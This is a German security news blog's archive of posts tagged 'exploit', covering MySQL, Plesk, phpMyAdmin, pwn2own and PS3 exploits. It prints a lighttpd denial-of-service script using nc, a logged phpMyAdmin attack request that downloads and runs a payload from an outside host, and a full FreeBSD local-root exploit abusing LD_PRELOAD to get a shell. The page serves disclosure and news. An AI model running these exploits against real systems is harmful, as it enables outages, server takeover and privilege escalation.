Archiv

Artikel Tagged ‘exploit’

Bye MySQL, Willkommen MariaDB

4. Dezember 2012 Keine Kommentare

Gestern war es ueberall zu lesen, Oracle hat einmal mehr gepennt mit seinen Updates fuer MySQL und ‚kingcope‘ oeffnete seine Spielzeugkiste und hat hier einige Exploits fuer MySQL auf den Weg geschickt in die grosse weite Welt.
Unter anderem sticht ein Kommentar ins Auge welches von Sergei Golubchik verfasst wurde, dem MariaDB Security Coordinator:

MariaDB is not vulnerable as of 5.1.66, 5.2.13, 5.3.11, 5.5.28a.
Latest released MySQL versions are still affected, but Oracle knows
about this issue, so next versions won’t be.

Somit wurde das letzte Stueck Oracle von Udopi entfernt, Java hat es ja schon vor einiger Zeit getroffen. Mehr…

Simpler Lighttpd 1.3.41 DOS Exploit

22. November 2012 Keine Kommentare

#!/bin/bash
# simple lighttpd 1.4.31 DOS POC
# CVE-2012-5533
# http://www.lighttpd.net/2012/11/21/1-4-32/
# http://download.lighttpd.net/lighttpd/security/lighttpd_sa_2012_01.txt
# written by Milan Berger

if [ $# -lt 2 ]
then
echo "usage :$0 "
else
echo -ne "GET / HTTP/1.1\r\nHost: pwn.ed\r\nConnection: TE,,Keep-Alive\r\n\r\n" | nc $1 $2
fi

Parallels Plesk Updates fuer 10.x

15. Juli 2012 Keine Kommentare

Ich hatte ja bereits ueber den 0Day unter Parallels Plesk geschrieben und auch ueber den Hinweis von Seitens Parallels das es natuerlich keine neue Sicherheitsluecke gibt, es waren natuerlich die Admins die hier bei einem alten Update gepatzt hatten.
Nun verwunderlich was man heute auf den Plesk Seiten lesen kann:

    Parallels Plesk Panel 10.4.4 MU #39 [15-Jul-2012]

[-] Fixed critical Plesk security issues found during internal security audit. All customers are highly recommended to update. Resolved issues were discovered during Plesk internal testing. These issues are not known to be available on public, so Parallels releases limited information. After most of Plesk systems updated, Parallels may disclose Mehr…

Plesk 10.4.4 Zero Day im Umlauf *update*

11. Juli 2012 2 Kommentare

In diversen Untergrundforen wird aktuell ein Plesk Zero Day gehandelt, das gute Stueck gibt es fuer ca. 8.000 USD und mittels des Exploits ist die volle Kontrolle von Plesk moeglich.
Die ersten 50.000 Seiten hat es schon erwischt und einen Fix gibt es noch keinen, fuer den doch relativ geringen Preis des Exploits wenn man seinen Nutzen sieht kann man weitere Webseiten erwarten die gehacked werden.
Auch melden die StormCenter einen massiven Anstieg der Portscans auf 8443, dem Standard Port fuer Plesk.
Fuer alle die kein Update machen koennen auf Plesk 11, warum auch immer ist die sicherste Massnahme sind aktuell wohl Plesk umgehend zu deaktivieren oder den Zugriff auf Port 8443 mittels einer Firewall einschraenken.

UPDATE: Laut Parallels handelt es sich nicht um eine neue Sicherheitsluecke sondern Parallels antwortet wie folgt: Mehr…

KategorienExploits, Security Tags: , , , , ,

Massive Hacks durch phpmyadmin Sicherheitsluecke

17. Januar 2012 Keine Kommentare

Seit einigen Tagen haeufen sich die Meldungen ueber gecrackte Server welche Schadsoftware installiert haben, nach einiger Suche konnte der Uebeltaeter ausgemacht werden, es handelt sich um veraltete phpmyadmin Installationen und ein Bot scanned diverse Webs und testet wahllos 2 Exploits:

50.56.100.212 „GET /phpMyAdmin/config/config.inc.php?eval=system(‚echo cd /tmp;wget http://sexday.in/~adminplus/srfl.jpg;tar xzvf srfl.jpg;chmod +x sfrl;./sfrl;curl -O wget http://sexday.in/~adminplus/srfl.jpg;tar xzvf srfl.jpg;chmod +x sfrl;./sfrl;lyxn -DUMP wget http://sexday.in/~adminplus/srfl.jpg;tar xzvf srfl.jpg;chmod +x sfrl;./sfrl‘);

Mehr…

pwn2own 2011 – Die Spiele haben begonnen

11. März 2011 Keine Kommentare

Wieder einmal pwn2own von Canceswest und die Spiele begannen bereits gestern und wie so oft geht es dem ersten Tag den Browsern an den Kragen und es standen Safari, Internet Explorer und Chrome zur Pwnage bereit, wieso Firefox hier aussen vorgelassen wurde ist mir voellig unbekannt und ein Stueck weit auch ein Raetsel. Durch Losentscheid wurde Safari zum ersten Ziel gekuehrt und wie jedes Jahr war es der Browser der am schnellsten ein gefundenes Opfer fuer die Sicherheitsexperten war, in diesem Falle das Team des Dienstleisters VUPEN. Mehr…

How To Exploit OSX

Offensive Security hat einen sehr schoenen Guide zum Thema OSX Exploits schreiben zur Verfuegung gestellt. In diesem wird schrittweise gezeigt, wie man mittels des Tools aus dem Xcode Paket von OSX, OllyDBG und Metasploit einem ueberlaufenden Puffer (Buffer Overflow) auf die Schliche kommt und diese gezielt ausnutzt. Es wird ein Exploit fuer Code Execution gebaut und gezeigt wie Register anzupassen sind um die passenden Speicheradressen zu ueberschreiben, auch das Umgehen der Lib Randomisation welche angeblich Schutz bieten soll wird im Paper beschrieben.

(Quelle: Evocam remote buffer overflow on osx)

1337 USD fuer Chrom(e|ium) Exploit

29. Januar 2010 Keine Kommentare

Google ruft Sicherheitsspezialisten auf ihre Browser Chrome oder Chromium auf Sicherheitsluecken zu testen, fuer eine gefundene Schwachstelle bietet Google hier 500 USD an, sollte es sich bei der Schwachstelle um eine besonders kritisches Schwachstelle handeln, oder der Bericht der Luecke besonders ausgefeilt sein odere die Technik welche zum exploiten genutzt wird, kann ein Gremium auch ueber eine Belohnung von 1337 USD entscheiden die dem erfolgreichen Hacker winkt.
Ob die Schwachstelle nun in Chrome oder Chromium gefunden wird ist dabei unerheblich, da die Unterschiede hier nur marginal ausfallen.
Einen aehnlichen Contest gab es bereits von einigen Jahren, dort wurde dieser von der Mozilla Foundation initiiert, die Beweggruende hierfuer sind sicherlich die Gleichen, man moechte sein eigenes Produkt moeglichst sicher machen.
Schwachstellen in Plugins von 3. Anbietern werden natuerlich in den Contest nicht miteinbezogen, alle weitere Infos gibt es hier

Playstation3 Exploit freigegeben

27. Januar 2010 Keine Kommentare

Ich dachte es mir ja eigentlich schon, aber ganz sicher war es nicht, aber er wurde released, der PS3 Exploit von George Hotz, als einen der Beweggruende schreibt Hotz, das er nicht Tag und Nacht an diese weiterarbeiten koenne, denn er habe noch ein Leben in das er zurueckkehren muss.
Neben dem Exploit bittet er darum weitere Erkenntnisse im psdev wiki zu posten und gibt als weitere Hilfestellung folgendes Binpaste mit auf den Weg.
Der Exploit funktioniert aktuell nur mit Version 2.4.2 und ist nicht fuer Piracy gedacht, einer der Gruende wieso PS Slim Cracker wenig Spass damit haben koennten, wohin der Hack fuehrt wird sich in den naechsten Wochen zeigen, ich persoenlich hoffe auf Homebrew fuer die PS3.
ps3_exploit

Eine grossartiges Stueck Arbeit welches Hotz uns hier schenkt, in diesem Sinne meinen Dank.

FreeBSD 8.0 Local Root 0day *update*

1. Dezember 2009 Keine Kommentare

Nikolaos Rangos aka Kingcope hat einen 0Day Exploit fuer FreeBSD 8.0/7.1 herausgegeben, laut Informationen die mir vorliegen sind teilweise auch FreeBSD 7.0 Systeme betroffen.
Der Fehler befindet sich im Run-Time Link Editor (rtld), im Normalfall erlaubt rtld keine gefaehrlichen Umgebungsvariablen wie LD_PRELOAD jedoch wenn setugid Binaries wie „su“ oder „ping“ ausgefuehrt werden aendert sich dies. Mit einer simplen Technik kann rtld also ausgtrickst werden und erlaubt LD Variablen auf setugid, folgener POC wurde bereitgestellt:

#!/bin/sh
echo ** FreeBSD local r00t zeroday
echo by Kingcope
echo November 2009
cat > env.c << _EOF #include

main() {
extern char **environ;
environ = (char**)malloc(8096);

environ[0] = (char*)malloc(1024);
environ[1] = (char*)malloc(1024);
strcpy(environ[1], "LD_PRELOAD=/tmp/w00t.so.1.0");

execl("/sbin/ping", "ping", 0);
}
_EOF
gcc env.c -o env
cat > program.c << _EOF #include
#include
#include
#include

void _init() {
extern char **environ;
environ=NULL;
system("echo ALEX-ALEX;/bin/sh");
}
_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles
cp w00t.so.1.0 /tmp/w00t.so.1.0
./env

Von Colin Percival des FreeBSD Entwicklerteams:

The patch is at
http://people.freebsd.org/~cperciva/rtld.patch
and has SHA256 hash
ffcba0c20335dd83e9ac0d0e920faf5b4aedf366ee5a41f548b95027e3b770c1

I expect a full security advisory concerning this issue will go out on
Wednesday December 2nd.

Der Patch ist wahrscheinlich noch nicht die Final Version und er wird nur unter der premisse: „use at your own risk (even more than usual)“ veroeffentlicht. Morgen soll ein Advisory mit final Patch released werden.